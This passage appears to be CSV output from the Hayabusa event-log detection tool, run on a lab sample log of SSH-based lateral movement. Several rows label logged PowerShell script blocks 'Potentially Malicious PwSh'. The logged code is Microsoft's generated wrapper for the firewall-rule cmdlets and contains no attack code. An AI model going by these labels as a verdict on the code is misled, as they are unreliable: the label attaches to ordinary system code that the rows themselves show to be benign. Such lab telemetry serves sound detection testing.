$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] 